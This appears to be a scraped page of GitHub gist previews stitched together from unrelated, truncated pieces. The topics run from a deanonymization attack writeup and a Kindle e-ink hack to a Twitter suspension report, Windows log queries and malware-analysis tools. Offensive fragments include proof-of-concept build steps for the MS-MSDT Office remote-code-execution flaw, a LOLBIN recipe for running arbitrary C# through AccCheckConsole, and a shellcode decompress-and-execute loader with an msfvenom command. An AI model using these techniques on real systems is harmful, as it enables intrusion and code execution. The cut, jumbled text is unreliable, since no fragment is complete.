@hackermondev
hackermondev / research.md
Last active October 30, 2025 12:45
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platforms

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

@adtac
adtac / README.md
Last active October 25, 2025 19:12
Using your Kindle as an e-ink monitor

3.5 fps, Paperwhite 3
@adtac_

step 1: jailbreak your Kindle

mobileread.com is your best resource here, follow the instructions from the LanguageBreak thread

I didn't really follow the LanguageBreak instructions because I didn't care about most of the features + I was curious to do it myself, but the LanguageBreak github repo was invaluable for debugging

Elon Musk's suspension reversals

The tables below show notable Twitter suspension reversals for each day since Elon Musk took over as owner and CEO.

All dates indicate when the suspension or reversal was detected, and the actual suspension or reversal may have been earlier. For most English-language accounts with large followings, this lag will generally not be longer than a few hours, but for accounts that have a small number of followers or that are outside the networks we are tracking, the difference can be larger, and in some cases an account on the list may have had its suspension reversed before 27 October 2022. These dates will get more precise as we refine the report.

Because of these limitations, this report should be considered a starting point for investigation, not a definitive list of suspension reversals.

function Get-RdpLogonEvent
{
[CmdletBinding()]
param(
[Int32] $Last = 10
)
$RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{
LogName='Security'
ProviderName='Microsoft-Windows-Security-Auditing'
@tothi
tothi / ms-msdt.MD
Last active June 16, 2025 21:37
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
<#
Meta
Date: 2022 March 28th
Updated: 2023 October 6th
Authors: Dray Agha (Twitter @purp1ew0lf), Dipo Rodipe (Twitter @dipotwb)
Company: Huntress Labs
Purpose: Automate setting up Sysmon and pulling Ippsec's sysmon IoC streamliner. Great for malware lab.
#>
################################################################################################################
@bohops
bohops / AccCheckConsole.txt
Last active February 28, 2024 19:15
AccChecker LOLBIN [AccCheckConsole.exe]
*Purpose
- UI Accessibility Checker
- Verifies UI accessibility requirements
*LOLBIN Functionality/Steps
1) Go to "Custom Verification Routines" link in reference section and copy the sample verification C# code into Visual Studio.
2) Add proper assembly references (e.g. AccCheck.dll)
3) Insert your C# code under a target method such as Execute()
4) Compile to a .NET managed library (DLL)
5) Invoke the code
@Wra7h
Wra7h / DecompressExecute.cs
Created December 2, 2021 08:04
Decompress shellcode w/ execution
//Decompressing shellcode and execution via callback
//Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\DecompressExecute.cs
//Windows Compression API: https://docs.microsoft.com/en-us/windows/win32/api/_cmpapi/
//Supported Algorithms: https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-createcompressor
// Step 1: generate shellcode
// Msfvenom: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o calc.bin
// Step 2: Compress the shellcode with my compress.cs gist here: https://gist.github.com/Wra7h/4d56791c2d0b5c1f27a67f3bc0ab924d
// Compression command: .\compress.exe -in C:\path\to\calc.bin -out .\LZMScalc.bin -alg 5
@DissectMalware
DissectMalware / deobfuscator.py
Last active January 18, 2022 15:18
VBA deobfuscation - Emotet XLSM
from oletools.olevba import VBA_Parser, TYPE_OLE, TYPE_OpenXML, TYPE_Word2003_XML, TYPE_MHTML
import sys
import re
vbaparser = VBA_Parser(sys.argv[1])
replace_regex = r"\s*([^=]+)\s*=\s*Replace\(\s*([^,]+)\s*,\s*\"([^,]*)\"\s*,\s*\"([^,]*)\"\s*\)"
replace = re.compile(replace_regex, re.MULTILINE)
regex_url = "http(s)?://[^,\"]+"
@aaaddress1
aaaddress1 / memBruteforce.cpp
Last active October 31, 2025 13:25
Windows 32-bit Shellcode Design without TEB & fs:30h
// memBruteforce.cpp by [email protected]
// brute search loaded modules in memory
// rewrite from https://www.exploit-db.com/exploits/45293
#include <Windows.h>
#include <iostream>
#pragma warning(disable:4996)
bool isMemExist(size_t addr) {
int retv;
__asm {